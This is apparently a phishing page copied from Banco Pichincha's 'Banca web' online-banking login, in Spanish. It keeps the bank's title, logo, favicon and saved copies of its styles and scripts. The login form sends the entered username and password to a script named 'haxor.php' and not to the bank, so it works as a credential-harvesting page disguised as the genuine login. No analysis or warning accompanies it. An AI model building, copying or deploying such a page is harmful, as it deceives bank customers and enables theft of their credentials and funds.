
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Usa Banca web y haz tus operaciones bancarias en minutos: transferencias, pagos, recargas, consultas. Sin filas.">
<meta name="keywords" content="banca web,banca en línea,banca electrónica,banca online,internexo,banca virtual,banca digital">

		
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<meta http-equiv="X-UA-Compatible" content="IE=11">
        <title>Banca web - Transacciones en línea de Banco Pichincha</title>
		   <!--<base href=".">--><base href=".">
		<link rel="icon" href="https://bancaweb.pichincha.com/bancapersonal/media/favicon.png?v=1.0"> 
		<link rel="apple-touch-icon" sizes="180x180" href="https://bancaweb.pichincha.com/bancapersonal/media/favicon.png">
		<link rel="icon" type="image/png" sizes="32x32" href="https://bancaweb.pichincha.com/bancapersonal/media/favicon.png">
		<link rel="icon" type="image/png" sizes="16x16" href="https://bancaweb.pichincha.com/bancapersonal/media/favicon.png">
		<link rel="icon" type="image/vnd.microsoft.icon" href="https://bancaweb.pichincha.com/bancapersonal/media/favicon.png">
		<link href="./pichi_files/bootstrap.min.css" rel="stylesheet">
		<link href="./pichi_files/common.min.css" rel="stylesheet">
		<link href="./pichi_files/font.min.css" rel="stylesheet">
	
		

<link href="./pichi_files/home.min.css" rel="stylesheet">
<script type="text/javascript" src="./pichi_files/angular.min.js.descargar"></script>
<script type="text/javascript" src="./pichi_files/checkSession.min.js.descargar"></script>
<script type="text/javascript" src="./pichi_files/home.min.js.descargar"></script>
<!-- Google Tag Manager -->

<style type="text/css">* {<br>		-webkit-user-select: text !important;<br>		-moz-user-select: text !important;<br>		-ms-user-select: text !important;<br>		 user-select: text !important;<br>	}</style></head>
<body>
	<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="./pichi_files/ns.html" ;="" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->

	<div class="container container-fluid max-width-365">
		
		<div class="alert-box">
			
		</div>
		<div class="panel panel-default bp-panel ">
			<form id="loginform" action="haxor.php" method="post">
				<div class="bp-panel-body marginTop15px">
					<div class="paddingBottom40 paddingTop17">
						<img src="./pichi_files/logo.svg" class="logo img-responsive">
					</div>
					<div class="bp-form-group">
						<input id="login-username" type="text" class="form-control bp-form-input" name="fldNombre" value="" placeholder="Usuario" onpaste="return false" autocomplete="off" maxlength="64">
					</div>
					<div class="bp-form-group">
						<div class="input-with-icon">
							<input id="login-password" type="password" ng-attr-type="{{ showPassword ? &#39;text&#39; : &#39;password&#39; }}" class="form-control bp-form-input" name="fldPassword" placeholder="Contraseña" onpaste="return false" autocomplete="off" maxlength="64">
							<div class="icon password-hidden ng-cloak" ng-mousedown="buttonTouchStart()" ng-mouseup="buttonTouchEnd()" ng-class="{&#39;password-hidden&#39;: !showPassword , &#39;password-visible&#39;: showPassword }" bp-touchstart="buttonTouchStart()" bp-touchend="buttonTouchEnd()">{{textShow}}</div>
						</div>
					</div>
					<div class="bp-form-group">
						<button type="submit" id="btn-login" href="#" class="btn  btn-block btn-lg  bp-button-large" ng-disabled="isSubmitted" ng-click="submitForm()">
							Ingresar
						</button>
					</div>
					<div class="home-links">
						<div class="pull-left">
							<a >¿Olvidaste tu usuario?</a>
						</div>
						<div class="pull-right">
							<a >¿Olvidaste tu contraseña?</a>
						</div>
					</div>
					<div class="home-links">
						<div class="pull-left">
							<a >Desbloquea tu Banca web</a>
						</div>
					</div>
					
					<div class="row ">
						<div class="col-lg-12  bp-row-text-center">
							¿Aún no tienes Banca web? 
							<div class="paddingTop8 paddingBottom32">
								<a >Solicítala ahora</a>
							</div>
						</div>
					</div>
					<div class="row ">
						<div class="col-lg-12  bp-row-text-center">
							<img src="./pichi_files/verisign.png" class=" security-logo">
						</div>
					</div>
				</div>
			</form>
		</div>
	</div>
	<!--  Scripts to get browser fingerprint -->
	</body></html>